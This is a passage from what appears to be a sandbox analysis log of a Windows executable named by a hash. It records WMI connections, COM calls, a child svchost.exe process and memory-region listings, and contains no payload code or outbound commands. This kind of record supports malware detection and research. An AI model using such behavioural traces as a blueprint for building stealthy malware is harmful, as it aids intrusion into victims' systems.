lpMultiByteStr="QualifierSet_GetNames\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 21 [0155.627] GetProcAddress (hModule=0x6c240000, lpProcName="QualifierSet_GetNames") returned 0x6c242668 [0155.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_BeginEnumeration", cchWideChar=29, lpMultiByteStr=0x4c9f074, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_BeginEnumeration\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 29 [0155.655] GetProcAddress (hModule=0x6c240000, lpProcName="QualifierSet_BeginEnumeration") returned 0x6c242616 [0155.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Next", cchWideChar=17, lpMultiByteStr=0x4c9f080, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Next\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 17 [0155.657] GetProcAddress (hModule=0x6c240000, lpProcName="QualifierSet_Next") returned 0x6c24267e [0155.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_EndEnumeration", cchWideChar=27, lpMultiByteStr=0x4c9f074, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_EndEnumeration", lpUsedDefaultChar=0x0) returned 27 [0155.682] GetProcAddress (hModule=0x6c240000, lpProcName="QualifierSet_EndEnumeration") returned 0x6c24263c [0155.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetCurrentApartmentType", cchWideChar=23, lpMultiByteStr=0x4c9f078, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentApartmentType", lpUsedDefaultChar=0x0) returned 23 [0155.685] GetProcAddress (hModule=0x6c240000, lpProcName="GetCurrentApartmentType") returned 0x6c242435 [0155.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDemultiplexedStub", cchWideChar=20, lpMultiByteStr=0x4c9f07c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDemultiplexedStubD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 20 [0155.698] GetProcAddress (hModule=0x6c240000, lpProcName="GetDemultiplexedStub") returned 0x6c242313 [0155.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateInstanceEnumWmi", cchWideChar=21, lpMultiByteStr=0x4c9f07c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateInstanceEnumWmi\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 21 [0155.722] GetProcAddress (hModule=0x6c240000, lpProcName="CreateInstanceEnumWmi") returned 0x6c2420db [0155.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateClassEnumWmi", cchWideChar=18, lpMultiByteStr=0x4c9f080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateClassEnumWmi÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 18 [0155.772] GetProcAddress (hModule=0x6c240000, lpProcName="CreateClassEnumWmi") returned 0x6c242065 [0155.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecQueryWmi", cchWideChar=12, lpMultiByteStr=0x4c9f084, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecQueryWmiD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 12 [0155.775] GetProcAddress (hModule=0x6c240000, lpProcName="ExecQueryWmi") returned 0x6c24227b [0155.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecNotificationQueryWmi", cchWideChar=24, lpMultiByteStr=0x4c9f078, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecNotificationQueryWmiD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 24 [0155.842] GetProcAddress (hModule=0x6c240000, lpProcName="ExecNotificationQueryWmi") returned 0x6c242202 [0155.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutInstanceWmi", cchWideChar=14, lpMultiByteStr=0x4c9f084, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutInstanceWmi÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 14 [0155.845] GetProcAddress (hModule=0x6c240000, lpProcName="PutInstanceWmi") returned 0x6c24257a [0155.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutClassWmi", cchWideChar=11, lpMultiByteStr=0x4c9f084, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutClassWmi", lpUsedDefaultChar=0x0) returned 11 [0155.906] GetProcAddress (hModule=0x6c240000, lpProcName="PutClassWmi") returned 0x6c2424fa [0155.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloneEnumWbemClassObject", cchWideChar=24, lpMultiByteStr=0x4c9f078, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloneEnumWbemClassObjectD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 24 [0155.912] GetProcAddress (hModule=0x6c240000, lpProcName="CloneEnumWbemClassObject") returned 0x6c241f40 [0155.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ConnectServerWmi", cchWideChar=16, lpMultiByteStr=0x4c9f080, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ConnectServerWmiD\x1a÷ht\x8fu\x80 «·lHóÉ\x04", lpUsedDefaultChar=0x0) returned 16 [0155.977] GetProcAddress (hModule=0x6c240000, lpProcName="ConnectServerWmi") returned 0x6c241fc3 [0156.076] CoCreateInstance (in: rclsid=0x6c241284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6c2412e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x4c9f7a4 | out: ppv=0x4c9f7a4*=0x4f53e0) returned 0x0 [0156.076] WbemLocator:IWbemLocator:ConnectServer (in: This=0x4f53e0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x4c9f838 | out: ppNamespace=0x4c9f838*=0x4e2058) returned 0x0 [0160.084] WbemLocator:IUnknown:QueryInterface (in: This=0x4e2058, riid=0x6c241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4c9f6d4 | out: ppvObject=0x4c9f6d4*=0x50c6dc) returned 0x0 [0160.084] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x50c6dc, pProxy=0x4e2058, pAuthnSvc=0x4c9f724, pAuthzSvc=0x4c9f720, pServerPrincName=0x4c9f718, pAuthnLevel=0x4c9f71c, pImpLevel=0x4c9f70c, pAuthInfo=0x4c9f710, pCapabilites=0x4c9f714 | out: pAuthnSvc=0x4c9f724*=0xa, pAuthzSvc=0x4c9f720*=0x0, pServerPrincName=0x4c9f718, pAuthnLevel=0x4c9f71c*=0x6, pImpLevel=0x4c9f70c*=0x2, pAuthInfo=0x4c9f710, pCapabilites=0x4c9f714*=0x1) returned 0x0 [0160.085] WbemLocator:IUnknown:Release (This=0x50c6dc) returned 0x1 [0160.085] WbemLocator:IUnknown:QueryInterface (in: This=0x4e2058, riid=0x6c2410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4c9f6c8 | out: ppvObject=0x4c9f6c8*=0x50c700) returned 0x0 [0160.085] WbemLocator:IUnknown:QueryInterface (in: This=0x4e2058, riid=0x6c241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4c9f6c4 | out: ppvObject=0x4c9f6c4*=0x50c6dc) returned 0x0 [0160.085] WbemLocator:IClientSecurity:SetBlanket (This=0x50c6dc, pProxy=0x4e2058, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0160.085] WbemLocator:IUnknown:Release (This=0x50c6dc) returned 0x2 [0160.085] WbemLocator:IUnknown:Release (This=0x50c700) returned 0x1 [0160.085] CoTaskMemFree (pv=0x510680) [0160.086] WbemLocator:IUnknown:Release (This=0x4f53e0) returned 0x0 [0160.086] WbemLocator:IUnknown:QueryInterface (in: This=0x4e2058, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4c9f2c4 | out: ppvObject=0x4c9f2c4*=0x50c700) returned 0x0 [0160.086] WbemLocator:IUnknown:QueryInterface (in: This=0x50c700, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4c9f280 | out: ppvObject=0x4c9f280*=0x0) returned 0x80004002 [0160.087] WbemLocator:IUnknown:QueryInterface (in: This=0x50c700, riid=0x6ccbfb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4c9f09c | out: ppvObject=0x4c9f09c*=0x0) returned 0x80004002 [0160.087] WbemLocator:IUnknown:QueryInterface (in: This=0x4e2058, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4c9ee74 | out: ppvObject=0x4c9ee74*=0x0) returned 0x80004002 [0160.088] WbemLocator:IUnknown:AddRef (This=0x50c700) returned 0x3 [0160.088] WbemLocator:IUnknown:QueryInterface (in: This=0x50c700, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4c9ebdc | out: ppvObject=0x4c9ebdc*=0x0) returned 0x80004002 [0160.088] WbemLocator:IUnknown:QueryInterface (in: This=0x50c700, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4c9eb8c | out: ppvObject=0x4c9eb8c*=0x0) returned 0x80004002 [0160.088] WbemLocator:IUnknown:QueryInterface (in: This=0x50c700, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4c9eb98 | out: ppvObject=0x4c9eb98*=0x50c65c) returned 0x0 [0160.088] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x50c65c, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4c9eba0 | out: pCid=0x4c9eba0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0160.089] WbemLocator:IUnknown:Release (This=0x50c65c) returned 0x3 [0160.089] CoGetContextToken (in: pToken=0x4c9ebf8 | out: pToken=0x4c9ebf8) returned 0x0 [0160.089] CoGetContextToken (in: pToken=0x4c9f000 | out: pToken=0x4c9f000) returned 0x0 [0160.089] WbemLocator:IUnknown:QueryInterface (in: This=0x50c700, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4c9f090 | out: ppvObject=0x4c9f090*=0x50c6e4) returned 0x0 [0160.090] WbemLocator:IRpcOptions:Query (in: This=0x50c6e4, pPrx=0x50c700, dwProperty=2, pdwValue=0x4c9f0b8 | out: pdwValue=0x4c9f0b8) returned 0x80004002 [0160.090] WbemLocator:IUnknown:Release (This=0x50c6e4) returned 0x3 [0160.090] WbemLocator:IUnknown:Release (This=0x50c700) returned 0x2 [0160.090] CoGetContextToken (in: pToken=0x4c9f5d8 | out: pToken=0x4c9f5d8) returned 0x0 [0160.090] CoGetContextToken (in: pToken=0x4c9f538 | out: pToken=0x4c9f538) returned 0x0 [0160.090] WbemLocator:IUnknown:QueryInterface (in: This=0x50c700, riid=0x4c9f608*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x4c9f604 | out: ppvObject=0x4c9f604*=0x4e2058) returned 0x0 [0160.090] WbemLocator:IUnknown:AddRef (This=0x4e2058) returned 0x4 [0160.090] WbemLocator:IUnknown:Release (This=0x4e2058) returned 0x3 [0160.091] WbemLocator:IUnknown:Release (This=0x4e2058) returned 0x2 [0160.118] SysStringLen (param_1=0x0) returned 0x0 [0160.119] CoUninitialize () Thread: id = 116 os_tid = 0xce0 [0160.189] CoGetContextToken (in: pToken=0x4c9f26c | out: pToken=0x4c9f26c) returned 0x0 [0160.189] CoGetContextToken (in: pToken=0x4c9f25c | out: pToken=0x4c9f25c) returned 0x0 [0160.189] CoGetMarshalSizeMax (in: pulSize=0x4c9f218, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x50c700, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x4c9f218) returned 0x0 [0160.192] CoMarshalInterface (pStm=0x504d90, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x50c700, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 Thread: id = 121 os_tid = 0x1048 Thread: id = 122 os_tid = 0x104c [0166.557] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0166.557] RoInitialize () returned 0x1 [0166.557] RoUninitialize () returned 0x0 [0166.559] ResetEvent (hEvent=0x3f4) returned 1 Thread: id = 128 os_tid = 0x10e0 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x39a4a000" os_pid = "0x2f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xaf4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 707 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 708 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 709 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 710 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 711 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 712 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 713 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 714 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 715 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 716 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 717 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 718 start_va = 0x7ff6bac60000 end_va = 0x7ff6bac6cfff monitored = 0 entry_point = 0x7ff6bac63980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 719 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 789 start_va = 0x7d0000 end_va = 0x7d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 790 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 791 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 792 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 793 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 794 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 795 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 796 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 797 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 798 start_va = 0x600000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 799 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 802 start_va = 0x680000 end_va = 0x71bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 827 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 828 start_va = 0x7ffb28a30000 end_va = 0x7ffb28a37fff monitored = 0 entry_point = 0x7ffb28a310b0 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 829 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 830 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 831 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 832 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 833 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Thread: id = 12 os_tid = 0xba0 [0141.879] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="PSAPI.DLL", BaseAddress=0xcff08 | out: BaseAddress=0xcff08*=0x7ffb28a30000) returned 0x0 [0142.062] LdrGetProcedureAddress (in: BaseAddress=0x7ffb28a30000, Name="EnumProcessModules", Ordinal=0x0, ProcedureAddress=0xcfe90 | out: ProcedureAddress=0xcfe90*=0x7ffb28a31020) returned 0x0 [0142.063] LdrGetProcedureAddress (in: BaseAddress=0x7ffb28a30000, Name="GetMappedFileNameA", Ordinal=0x0, ProcedureAddress=0xcfe90 | out: ProcedureAddress=0xcfe90*=0x7ffb28a313e0) returned 0x0 [0142.063] LdrGetProcedureAddress (in: BaseAddress=0x7ffb28a30000, Name="GetModuleFileNameExA", Ordinal=0x0, ProcedureAddress=0xcfe90 | out: ProcedureAddress=0xcfe90*=0x7ffb28a31410) returned 0x0 [0142.063] LdrLoadDll (SearchPath=0x0, LoadFlags=0x0, Name="SHLWAPI.dll", BaseAddress=0xcff08) Thread: id = 16 os_tid = 0x1010 Process: id = "5" image_name = "efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" page_root = "0x38a86000" os_pid = "0x10cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xc80" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 805 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 806 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 807 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 808 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 809 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 810 start_va = 0xb0000 end_va = 0xb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 811 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 812 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 813 start_va = 0x400000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 814 start_va = 0xf20000 end_va = 0x1129fff monitored = 1 entry_point = 0xf47dcd region_type = mapped_file name = "efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe") Region: id = 815 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 816 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 817 start_va = 0xfffb0000 end_va = 0xfffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000fffb0000" filename = "" Region: id = 818 start_va = 0xfffe0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffe0000" filename = "" Region: id = 819 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 820 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 824 start_va = 0xd0000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 